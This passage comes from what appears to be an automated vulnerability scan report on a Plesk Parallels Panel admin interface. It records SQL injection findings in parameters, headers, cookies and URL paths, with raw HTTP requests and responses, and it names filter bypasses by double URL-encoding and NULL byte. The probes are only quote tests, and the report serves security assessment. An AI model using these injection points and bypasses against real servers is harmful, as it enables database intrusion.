contactInfoSection%5BcontactInfo%5D%5BcontactName%5D=&contactInfoSection%5BcontactInfo%5D%5Bemail%5D=&contactInfoSection%5BcontactInfo%5D%5BcompanyName%5D=&contactInfoSection%5BcontactInfo%5D%5Bphone%5D=&contactInfoSection%5BcontactInfo%5D%5Bfax%5D=%2527&contactInfoSection%5BcontactInfo%5D%5Baddress%5D=&contactInfoSection%5BcontactInfo%5D%5Bcity%5D=&contactInfoSection%5BcontactInfo%5D%5Bstate%5D=&contactInfoSection%5BcontactInfo%5D%5BpostalCode%5D=&c
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:00:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:00:15 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-Type: application/json
Date: Fri, 23 Sep 2011 19:00:16 GMT
Server: sw-cp-server
Content-Length: 1037

{"formMessages":{"contactInfoSection":{"contactInfo":{"contactName":{"isEmpty":"Please provide a contact name."},"email":{"isEmpty":"Please provide an e-mail address."},"fax":{"regexNotMatch":"This fa
...[SNIP]...
de a domain name."},"userName":{"isEmpty":"Please provide a username."},"password":{"isEmpty":"Please provide a password."},"passwordConfirmation":{"isEmpty":"Please provide a password."}}}},"status":"error","statusMessages":[{"status":"error","content":"Invalid URL was requested.","title":"Error"}]}

Request 2

POST /admin/customer/create HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1_rc3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create
Content-Length: 1324
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers
Pragma: no-cache
Cache-Control: no-cache

contactInfoSection%5BcontactInfo%5D%5BcontactName%5D=&contactInfoSection%5BcontactInfo%5D%5Bemail%5D=&contactInfoSection%5BcontactInfo%5D%5BcompanyName%5D=&contactInfoSection%5BcontactInfo%5D%5Bphone%5D=&contactInfoSection%5BcontactInfo%5D%5Bfax%5D=%2527%2527&contactInfoSection%5BcontactInfo%5D%5Baddress%5D=&contactInfoSection%5BcontactInfo%5D%5Bcity%5D=&contactInfoSection%5BcontactInfo%5D%5Bstate%5D=&contactInfoSection%5BcontactInfo%5D%5BpostalCode%5D=&c
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:00:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:00:17 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-Type: application/json
Date: Fri, 23 Sep 2011 19:00:17 GMT
Server: sw-cp-server
Content-Length: 966

{"formMessages":{"contactInfoSection":{"contactInfo":{"contactName":{"isEmpty":"Please provide a contact name."},"email":{"isEmpty":"Please provide an e-mail address."},"fax":{"regexNotMatch":"This fa
...[SNIP]...

1.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list [searchFilter[resourceUsage][searchText] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/list

Issue detail

The searchFilter[resourceUsage][searchText] parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the searchFilter[resourceUsage][searchText] parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /admin/customer/list?force-show-search=true&searchFilter[resourceUsage][searchText]=overuse' HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Expires: Sun, 23 Oct 2011 19:19:32 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:19:33 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=deleted; expires=Thu, 23-Sep-2010 19:19:32 GMT; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:19:33 GMT
Server: sw-cp-server
Content-Length: 5734


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</span>
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '))' at line 6 </h2>
...[SNIP]...

Request 2

GET /admin/customer/list?force-show-search=true&searchFilter[resourceUsage][searchText]=overuse'' HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Expires: Sun, 23 Oct 2011 19:19:34 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:19:35 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:19:35 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

1.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/true/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/list/reset-search/true/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /admin/customer/list/reset-search/true/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home

Response 1

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 15:42:42 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:42:42 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 15:42:43 GMT
Server: sw-cp-server
Content-Length: 16854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
</span> Invalid URL was requested. </div>
...[SNIP]...

Request 2

GET /admin/customer/list/reset-search/true/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home

Response 2

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 15:42:43 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:42:43 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 15:42:43 GMT
Server: sw-cp-server
Content-Length: 16316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

1.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/home/reseller

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /admin/home/reseller HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1%2527
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/preferences?context=interface-pref
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=interface-pref; BarExpanded=True

Response 1

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 15:37:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:37:57 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=home; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 15:37:57 GMT
Server: sw-cp-server
Content-Length: 13175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
</span> Invalid URL was requested. </div>
...[SNIP]...

Request 2

GET /admin/home/reseller HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1%2527%2527
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/preferences?context=interface-pref
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=interface-pref; BarExpanded=True

Response 2

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 15:37:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:37:57 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=home; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 15:37:57 GMT
Server: sw-cp-server
Content-Length: 12922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

1.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/personal-info/ [psaContext cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/personal-info/

Issue detail

The psaContext cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the psaContext cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /admin/reseller/personal-info/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=customers%00'

Response 1

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 15:42:51 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:42:51 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=personal-info; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 15:42:51 GMT
Server: sw-cp-server
Content-Length: 28457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
</span> Invalid URL was requested. </div>
...[SNIP]...

Request 2

GET /admin/reseller/personal-info/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=customers%00''

Response 2

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 15:42:51 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:42:51 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=personal-info; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 15:42:51 GMT
Server: sw-cp-server
Content-Length: 28204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

1.7. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/list

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /admin/subscription%2527/list HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 15:45:39 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:45:40 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=home; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 15:45:40 GMT
Server: sw-cp-server
Content-Length: 12603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<script type="text/javascript">
Jsw.baseUrl = '/admin';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>
...[SNIP]...

Request 2

GET /admin/subscription%2527%2527/list HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home

Response 2

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 15:45:41 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:45:41 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 15:45:41 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

1.8. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 [locale cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /login_up.php3

Issue detail

The locale cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the locale cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the locale cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /login_up.php3 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US%2527

Response 1

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 18:24:33 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Plesk: PSA-Key/PLSK016479390000
Date: Fri, 23 Sep 2011 18:24:33 GMT
Server: sw-cp-server
Content-Length: 5569

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Cont
...[SNIP]...
<DIV class="msg-box msg-error">
...[SNIP]...

Request 2

GET /login_up.php3 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US%2527%2527

Response 2

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 18:24:34 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Plesk: PSA-Key/PLSK016479390000
Date: Fri, 23 Sep 2011 18:24:34 GMT
Server: sw-cp-server
Content-Length: 5389

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Cont
...[SNIP]...

1.9. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /login_up.php3

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /login_up.php3?1%00'=1 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US

Response 1

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 18:25:20 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Plesk: PSA-Key/PLSK016479390000
